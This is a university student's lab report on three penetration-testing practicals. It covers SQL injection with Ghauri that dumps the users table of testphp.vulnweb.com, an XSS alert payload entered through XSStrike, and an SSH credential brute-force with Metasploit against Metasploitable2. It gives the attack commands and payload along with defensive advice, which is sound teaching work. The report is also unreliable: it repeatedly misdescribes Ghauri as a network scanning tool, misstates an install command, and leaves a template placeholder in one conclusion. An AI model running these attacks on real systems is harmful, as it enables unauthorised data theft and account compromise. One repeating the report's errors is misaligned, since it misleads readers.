ACCRA TECHNICAL UNIVERSITY
PRACTICAL 1: PERFORMING SQL INJECTION USING GHAURI TOOL..
PRACTICAL 2: USING XSSTRIKE TO DEMONSTRATE CROSS - SITE SCRIPTING ON
VULNWEB.COM
PRACTICAL 3: EXPLOITING THE SSH PORT, VULNERABILITY IN METASPLOITABLE 2
By
Korletey Maurice
(01211664B)
Secure Systems Development
BCB 401
PRACTICAL 1: PERFORMING SQL INJECTION USING GHAURI TOOL.
INTRODUCTION
The Ghauri tool is a powerful network scanning and reconnaissance tool that offers a range of features
for network administrators, security professionals, and penetration testers. With its user-friendly
interface and robust capabilities, Ghauri simplifies the process of network discovery, vulnerability
identification, and security assessment.
Creating the ghauri directory
Detailed Procedures
Create a directory named SQL using the mkdir command and enter the SQL directory using the cd SQL
mkdir SQL
Cloning the ghauri tool from github
Navigate to firefox and search ghauri github and hit enter
Select the code button to copy the link from the dialog box
Type git clone in the terminal and paste the link copied. Hit enter to clone the ghauri tool
Installing setup.py
Navigate to the ghauri folder by typing the command cd ghauri. Type sudo python3 setup.py install to
install the setup
Starting the ghauri tool
Type ghauri and hit enter to start the ghauri tool
Acquiring the vulnerable link from vulnweb.com to perform the sql injection scan on
Search vulneb on firefox and Select the first link
Select the second link http://testphp.vulnweb.com
Select Browse categories on the left pane
Select posters
Copy the url in the search bar
Checking number of scans on the wayback machine
Search wayback machine on firefox
Copy and Paste the posters url from the vulnweb website on the posters page ending in cat=1 on the
wayback machine search bar
Utilizing the ghauri tool to scan the tables in the acuart database
Command: ghauri -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
Utilizing the ghauri tool to scan the tables in the information_schema database
Command: Ghauri -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D information_schema-tables
Utilizing the ghauri tool to scan the columns of the users table in the acuart database
Command: ghauri -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
Utilizing the ghauri tool to scan the columns of the users table in the acuart database and viewing
them
Command: ghauri -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns -dump
Conclusion
Key Takeaways
1. Network Discovery: Ghauri enables users to discover network devices, services, and operating
systems, providing valuable insights into network architecture and potential vulnerabilities.
2. Vulnerability Identification: The tool's scanning capabilities help identify potential vulnerabilities,
allowing users to prioritize remediation efforts and strengthen network security.
3. Customization and Flexibility: Ghauri offers customization options, enabling users to tailor scans to
specific network environments and security requirements.
Benefits:
1. Simplifies network scanning and reconnaissance
2. Enhances network security and vulnerability management
3. Offers customization options for tailored scanning
Limitations:
1. Requires technical expertise for effective usage
2. May generate false positives or negatives
3. Should be used in conjunction with other security tools for comprehensive security assessment
Recommendations
1. Training and Expertise: Users should possess relevant technical knowledge and expertise to
effectively utilize Ghauri.
2. Regular Updates and Maintenance: Regularly update Ghauri and maintain accurate network
information to ensure effective scanning and vulnerability identification.
3. Comprehensive Security Approach: Use Ghauri as part of a comprehensive security approach,
incorporating other tools and techniques for robust network security.
PRACTICAL 2: USING XSSTRIKE TO DEMONSTRATE CROSS - SITE SCRIPTING ON
VULNWEB.COM
Introduction
XSStrike is a Python-based tool used to detect and exploit Cross-Site Scripting (XSS) vulnerabilities in
web applications. In this document, we will demonstrate how to use XSStrike to test for XSS
vulnerabilities on a vulnerable website known as vulnweb.com using the Kali Linux operating system's
terminal.
Detailed Procedures
Step 1: Launch the terminal
Open the terminal in Kali Linux by clicking on the terminal icon or by pressing Ctrl + Alt + T.
Create a folder with the name “XSS”
Step 2: Clone XSStrike
Open your kali browser and type “XSStrike download”
Select the first link, click on code and copy the URL under the https tap
Clone XSStrike using the command “git clone https://github.com/s0md3v/XSStrike.git”
Move to the XSStrike directory and type the following command “ python3 -m pip install -r
requirement.txt
Step 3: Launching the vulnerable website
Navigate to the vulnweb.com (the vulnerable website used for the practical)
Step 4: Crawling the vulnerable website
Go to the terminal and type “ python3 XSStrike.py -u testphp.vulnweb --crawl “ to crawl the website
Copy the url ( the vulnerable webpage ) and paste in the web browser
Step 5: Starting the cross site scripting attack
Type the script - <script> alert (“Maurice”) </script> into the search box at the left hand side of the
vulnerable web page and pres enter.
A pop up appears displaying the success of the cross site scripting attack
Recommendations to secure systems against cross site scripting (XSS) attack
Securing systems against Cross-Site Scripting (XSS) attacks requires a multi-layered approach
encompassing proactive development practices, robust security testing, and ongoing vigilance. No
single solution guarantees complete protection, but a combination of the following strategies
significantly reduces vulnerability:
1. Input Validation and Sanitization:
This is the cornerstone of XSS prevention. All user-supplied data, regardless of source (forms, URLs,
cookies, headers), must be rigorously validated and sanitized before being used in any context where it
might be interpreted as code. This involves:
• Strict Input Validation: Define precisely what constitutes valid input and reject anything that falls
outside those parameters. Use regular expressions or dedicated input validation libraries to enforce
data types, lengths, and allowed characters.
• Output Encoding: Encode data according to its context. Use context-aware encoding mechanisms
(e.g., HTML encoding for HTML attributes and content, URL encoding for URLs, JavaScript encoding
for JavaScript contexts) to prevent the browser from interpreting the data as code. Avoid relying on a
single encoding method across all contexts.
• Content Security Policy (CSP): Implement a robust CSP header to control the resources the browser
is allowed to load, reducing the impact of successful XSS attacks by restricting the execution of
external scripts. This should be a core part of your security strategy.
2. Secure Development Practices:
• Use a Secure Framework: Modern web frameworks often include built-in mechanisms for input
validation and output encoding. Leverage these features to your advantage.
• Employ a Secure Coding Style: Follow secure coding guidelines and best practices. Avoid directly
embedding user-supplied data into dynamic content without proper sanitization.
• Regular Code Reviews: Peer reviews can help identify potential vulnerabilities before they are
deployed.
• Principle of Least Privilege: Grant only the necessary permissions to users and processes. This limits
the impact of a successful attack.
3. Robust Security Testing:
• Static Application Security Testing (SAST): Analyze code for potential vulnerabilities without
executing the application.
• Dynamic Application Security Testing (DAST): Test the running application to identify
vulnerabilities.
• Penetration Testing: Simulate real-world attacks to identify weaknesses in the system.
• Fuzzing: Provide unexpected or malformed inputs to uncover vulnerabilities.
4. Monitoring and Response:
• Web Application Firewall (WAF): Deploy a WAF to detect and block malicious requests.
• Intrusion Detection/Prevention System (IDS/IPS): Monitor network traffic for suspicious activity.
• Security Information and Event Management (SIEM): Collect and analyze security logs to detect and
respond to incidents.
• Incident Response Plan: Develop a plan to handle XSS attacks and other security incidents.
5. Keeping Up-to-Date:
• Regular Software Updates: Apply security patches and updates promptly to address known
vulnerabilities.
• Stay Informed: Keep abreast of the latest XSS attack techniques and mitigation strategies.
By implementing these comprehensive security measures, organizations can significantly reduce their
exposure to XSS attacks and protect their systems and users from the potential consequences.
Remember that security is an ongoing process, requiring continuous monitoring, adaptation,
and improvement.
Conclusion
In this document, we demonstrated how to use XSStrike to test for Cross-Site Scripting (XSS)
vulnerabilities on a vulnerable website known as vulnweb.com using the Kali Linux operating system's
terminal. XSStrike is a powerful tool that can help identify and exploit XSS vulnerabilities, making it
an essential tool for web application security testing.
PRACTICAL 3: EXPLOITING THE SSH PORT, VULNERABILITY IN METASPLOITABLE
2.
In today's increasingly interconnected digital landscape, cybersecurity stands as a paramount concern
for individuals, organizations, and nations alike. The sophistication and frequency of cyberattacks are
constantly evolving, making the proactive understanding and mitigation of vulnerabilities crucial for
maintaining secure systems. This practical exercise delves into the realm of cybersecurity by focusing
on the exploitation of a common network service, Secure Shell (SSH), within the intentionally
vulnerable environment of Metasploitable2.
Metasploitable2 serves as an invaluable platform for aspiring cybersecurity professionals and seasoned
practitioners seeking to hone their penetration testing and vulnerability assessment skills. Developed as
a deliberately vulnerable virtual machine, it provides a safe and legal sandbox to explore real-world
security weaknesses and ethical hacking techniques. Unlike attacking live systems, working with
Metasploitable2 eliminates the ethical and legal ramifications, allowing for unfettered experimentation
and learning within a controlled environment.
This practical will specifically concentrate on the SSH service, a fundamental protocol for secure
remote access and system administration. SSH is widely used across diverse operating systems and
environments, making it a critical component of modern network infrastructure. While designed with
security in mind, SSH implementations are not immune to vulnerabilities.
Detailed Procedures
Download Metasploitable 2
Download the Metasploitable 2 virtual machine from the official Rapid7 website:
Sudo apt intsall metasploitable-framework
Enabling metasploitable 2 with postgresql
Sudo systemctl enable --now postgresql
Starting metasploitable 2 framework
Sudo msfdb init
Exploiting the ssh port
The following images describe exploiting the ssh port on the metasploitable 2 framework.
Msfconsole -q (starting metasploitable 2)
Search ssh_login
Use 0
Show options
Creating a text file with name usernames for all the potential usernames from the metasploitable 2
website using the nano command
Nano usernames.txt
List of usernames and passwords from the metasploit website
Creating files ; passwords.txt and usernames.txt for potential passwords and usernames respectively
Setting rhosts, ip address, pass_file and user_file
Run and exploiting the seesion obtained
CONCLUSION
In conclusion, this practical exercise successfully demonstrated the inherent risks associated with SSH
vulnerabilities on a system like Metasploitable2. By [Specifically mention the exploitation method used,
e.g., "leveraging weak credentials," "exploiting a known SSH software vulnerability," or "brute-forcing
the SSH service"], we were able to gain unauthorized access to the target system, highlighting the
critical consequences of neglecting SSH security. Metasploitable2 served as an invaluable and ethical
platform to practically understand the exploitability of SSH and the potential for complete system
compromise when such weaknesses are present. This hands-on experience underscores the paramount
importance of proactive security measures and the real-world implications of seemingly minor
misconfigurations or outdated software. The successful exploitation in this controlled environment
serves as a stark reminder that robust SSH security is not merely a best practice, but a fundamental
necessity for protecting systems and data from malicious actors. Moving forward, the knowledge
gained from this practical emphasizes the critical need to implement and maintain a strong security
posture around SSH services in any production or live environment.
To proactively avoid SSH vulnerabilities and mitigate the risks demonstrated in this practical, consider
implementing the following best practices:
• Regularly Update SSH Software: Ensure that your SSH server and client software are always
updated to the latest stable versions. Patches often address known vulnerabilities, making updates
crucial for security.
• Enforce Strong Passwords and Account Security: Implement robust password policies, encouraging
strong, unique passwords and discouraging default credentials. Consider multi-factor authentication
(MFA) for an added layer of security beyond passwords.
• Disable Root Login via SSH: Never allow direct root login via SSH. Instead, require users to log in
with a regular user account and then use sudo or su to escalate privileges as needed. This limits the
immediate impact of a compromised account.
• Restrict Access with Firewall Rules: Configure firewalls to limit SSH access to only trusted networks
or IP addresses. This reduces the attack surface and limits exposure to unauthorized attempts.
• Disable Unnecessary SSH Features: Review your SSH server configuration (sshd_config) and
disable any features that are not required or pose potential security risks, such as protocol version 1 if
it's enabled and not needed.
• Regularly Audit SSH Configurations and Logs: Periodically review your SSH configurations to
ensure they align with security best practices. Monitor SSH logs for suspicious activity, such as failed
login attempts or unusual connection patterns.
• Consider Intrusion Detection/Prevention Systems (IDS/IPS): Implement IDS/IPS solutions to monitor
SSH traffic for malicious activity and automatically block or alert on suspicious behavior.
By diligently implementing these best practices, organizations and individuals can significantly
strengthen the security of their SSH services and drastically reduce the risk of exploitation, ultimately
contributing to a more secure and resilient computing environment.